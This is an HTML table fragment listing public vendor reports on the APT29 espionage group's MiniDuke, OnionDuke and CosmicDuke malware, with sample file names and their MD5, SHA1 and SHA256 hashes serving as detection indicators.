<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2013-04_Bitdefender_A Closer Look at MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2013</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2013</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">56dfc5905e7dfc67912ed164dc68c0806fdd3d7cd151415aaffcc1b7ab2f1a84</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2530f54b87508e6f09a6bc5ab863b5db</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">56dfc5905e7dfc67912ed164dc68c0806fdd3d7cd151415aaffcc1b7ab2f1a84</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2013</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6c2409d415e66faebf0a031350b44d5a014ab4f62f2c1a3115982d452b7f97b9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">527537cc28705e01af8d8006ae8308a9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6c2409d415e66faebf0a031350b44d5a014ab4f62f2c1a3115982d452b7f97b9</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2013</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7815e5275ea849a9ed1f193abd8781ff7ae6b88ef6282f6a0900175a4bb59131</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">810de1b9fa0a9396acae23dcd113a60d</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7815e5275ea849a9ed1f193abd8781ff7ae6b88ef6282f6a0900175a4bb59131</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2013</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">abfffd23c81b6301675567622ccee08cf578ce91f372fce68cff8fc1dbc3053d</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c786a4cdfe08dbe7c64972a14669c4d1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">abfffd23c81b6301675567622ccee08cf578ce91f372fce68cff8fc1dbc3053d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2013</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ecc5e2526ca32a447c862612b71c1db5675a759897e680573fa143ac0a8e662a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e863737773f64498091cd775c7abde66</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ecc5e2526ca32a447c862612b71c1db5675a759897e680573fa143ac0a8e662a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2013</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f0d822926f4e6aec2cf2bd7701d67e8399ccc05bc028377a275a90e06620a109</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6942f1dfd61d231df8acb7ed0f6310c4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f0d822926f4e6aec2cf2bd7701d67e8399ccc05bc028377a275a90e06620a109</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-04_FSecure_Targeted Attacks and Ukraine</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-04_FSecure_Targeted Attacks and Ukraine</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">77A62F51649388E8DA9939D5C467F56102269EB1_Nato_pdf_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">06cca401a1049ae2fbb4f00aac720136</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">081a9def7150ffd17d6c794b10609fd3463bebe0810bbf241162699a53779113</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-04_FSecure_Targeted Attacks and Ukraine</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">download</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">download</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1e5525eb2b80ed57635f0922bc5d1c56812fb8e0da64a9333b0ba66c4411b6b4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ba57f95eba99722ebdeae433fc168d72</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1e5525eb2b80ed57635f0922bc5d1c56812fb8e0da64a9333b0ba66c4411b6b4</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">download</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bd4928921ddadb44f9f573da61dac034533bf14fe38acd5754f3ccec1d566300</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">edf7a81dab0bf0520bfb8204a010b730</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bd4928921ddadb44f9f573da61dac034533bf14fe38acd5754f3ccec1d566300</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-05_FSecure.Miniduke still duking it out</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-05_FSecure.Miniduke still duking it out</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">58be4918df7fbf1e12de1a31d4f622e570a81b93_Proposal-Cover-Sheet-English.rtf_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6b08ff05b50dd89d81e2aa47554aa5e6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4c663f1b23d44283bbd2693ffb03a3864ad4455deb079a4f5c94d92be53a88cd</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-05_FSecure.Miniduke still duking it out</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b27f6174173e71dc154413a525baddf3d6dea1fd.dll_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">270ca8368cd4216b1813281d3efe485d</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2ae4cc6834e3679e99fc93d2f5fba02167a31cf5b68a5a9ca7aa1a4b9f7cb4ae</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-07_Kaspersky_Miniduke is back_Nemesis Gemina and the Botgen Studio</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-07_Kaspersky_Miniduke is back_Nemesis Gemina and the Botgen Studio</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">86EC70C27E5346700714DBAE2F10E168A08210E4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ba57f95eba99722ebdeae433fc168d72</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1e5525eb2b80ed57635f0922bc5d1c56812fb8e0da64a9333b0ba66c4411b6b4</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-07_Kaspersky_Miniduke is back_Nemesis Gemina and the Botgen Studio</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ECD2FEB0AFD5614D7575598C63D9B0146A67ECAA</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">edf7a81dab0bf0520bfb8204a010b730</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bd4928921ddadb44f9f573da61dac034533bf14fe38acd5754f3ccec1d566300</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-07_Kaspersky_The MiniDuke Mystery PDF 0-day</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-07_Kaspersky_The MiniDuke Mystery PDF 0-day</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2402C2DC6ACC5A8418201FEA5B2043F985E1DD69_EUAG_report.pdf_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">cf5a5239ada9b43592757c0d7bf66169</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5fbe3c1075e1afb6c1a3ce757bb8d401e1b1f61db42902cb72fd7b85e4e5f1a5</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-07_Kaspersky_The MiniDuke Mystery PDF 0-day</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5951EEF7C336E442C95F247AB2ECC4895F5D3E45_ c.pdf_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0cdf55626e56ffbf1b198beb4f6ed559</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">59b62e650a437032886e1cc74dd7cdf0abab5ee6bc85fb4aa18568733aa89370</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-07_Kaspersky_The MiniDuke Mystery PDF 0-day</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ADCB57BCE7FBB5E076F3272990BEDEE1D9544EE5_EUAG_report.pdf__</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3f301758aa3d5d123a9ddbad1890853b</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8a844864e62650905fc438f6291fa64ae2d3822054cc8354c44a923d5364905e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-07_Kaspersky_The MiniDuke Mystery PDF 0-day</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">FBC3856FD689E1AC0F8FB56BBD7D0A2B8332A928_ ASEM_Seminar.pdf_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">88292d7181514fda5390292d73da28d4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">784d1ebd1faccec27f98970cc266859eaf5676da1c451e3304fb55435d8c8473</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-07_Kaspersky_The MiniDuke Mystery PDF 0-day</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">FC53525F4E2E5B8EBE86778C20FD8916612CFD29_action_plan.pdf_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3668b018b4bb080d1875aee346e3650a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5b21100b828b77758bfd6495c924e71f8bbd890c78d07067928bd7beccae087e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-07_Kaspersky_The MiniDuke Mystery PDF 0-day</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">The 2013 Armenian Economic Association.pdf _</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c03bcb0cde62b3f45b4d772ab635e2b0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">da7f82d0c80c7d95d787185c04ecc116062bc655e513eaf1ccb4a1423bdbd289</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-07_Kaspersky_The MiniDuke Mystery PDF 0-day</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">themysteryofthepdf0-dayassemblermicrobackdoor.pdf</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">304bb5f1419a2e56f4bcd0d0f3b1312f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b7cf61434cb485baafd9c3205f64c0cc8f1fa2302f9405a16cd421e888f4973e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-11_FSecure_OnionDuke APT Attacks Via the Tor Network</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-11_FSecure_OnionDuke APT Attacks Via the Tor Network</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A75995F94854DEA8799650A2F4A97980B71199D2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">28f96a57fa5ff663926e9bad51a1d0cb</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">19972cc87c7653aff9620461ce459b996b1f9b030d7c8031df0c8265b73f670d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-11_FSecure_OnionDuke APT Attacks Via the Tor Network</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">B491C14D8CFB48636F6095B7B16555E9A575D57F</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c8eb6040fd02d77660d19057a38ff769</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014-11_FSecure_OnionDuke APT Attacks Via the Tor Network</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">D433F281CF56015941A1C2CB87066CA62EA1DB37</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d1ce79089578da2d41f1ad901f7b1014</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0E5F55676E01D8E41D77CDC43489DA8381B68086</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">dc6cc442c0900104a5601a6049354fad</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">41d63d293a6e2722fcf82f8bf67b8f566bd4d3f669ede146ccc286f0228d8f62</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">353540C6619F2BBA2351BABAD736599811D3392E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ab7a66ed3c6de1b7449d6054a8b46d7f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8cad0a40dd87e5d77e5c939bd7ea838c3549c44b525e2f4a1227d53c4af925be</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4E3C9D7EB8302739E6931A3B5B605EFE8F211E51</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9d95c8f09f991a5fc37b79c45ebd2043</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3c5d2fcacafc21d9f43c595ddf03bec801ccb958b8641018612c21bc741800d0</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5295B09592D5A651CA3F748F0E6401BD48FE7BDA</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6571a2d3892ca937697e96f8bb795e42</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8c6c57f7e9c81fcf194d17a752f8da4295fab5dad8eb79bd289256b9cdb7415e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">55F83FF166AB8978D6CE38E80FDE858CF29E660B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8e5106565fd96df1308d208d1e3426a3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7e371cd323898e403df7a80add34d791e160e443bcd2d02f27ddc0c04ba1bdab</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">580ECA9E36DCD1A2DEB9075BCAE90AFEE46AACE2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">351c913e4120081d8f04317121654a39</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1590bdbaff2c178387e924b689b030057b4cbd2865e9c4dd3886a8791ac8e4ee</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5A199A75411047903B7BA7851BF705EC545F6DA9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f22606385080d35551e7f8e8f49b7de9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fe5bc1248fc79fc15663ef169f0a269c1abe847d00b01e9571fe5c0d760d68f0</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5C5EC0B5112A74A95EDC23EF093792EB3698320E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3729a14be6b3a92265cf6d8e14c79abe</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">64e3a2bba82027dd6ff631fa5890a7ba8331b62a0a4c0b1ca24d143c2b61c323</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">65681390D203871E9C21C68075DBF38944E782E8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6542cd548182d6adc08a63c942f9bc54</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">880ae80fdc874002a6d9c807802794d4a35c384551d73bb36277b2f1e63d67e2</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6A43ADA6A3741892B56B0EF38CDF48DF1ACE236D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">dc92eba92885f2e937cb6f694647eb71</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3d37e753812687fb7287cf8644d13fe2673ea7c3b540637c1ce1c6819f1c521b</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6DB1151EEB4339FC72D6D094E2D6C2572DE89470</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5a7659b691a3caf107e6636d8906dcb0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">334ed05005ce829224d0dd4cc5baab6b837cf02ac0e321c8f97d11b3ba1c77a7</span></td></tr>
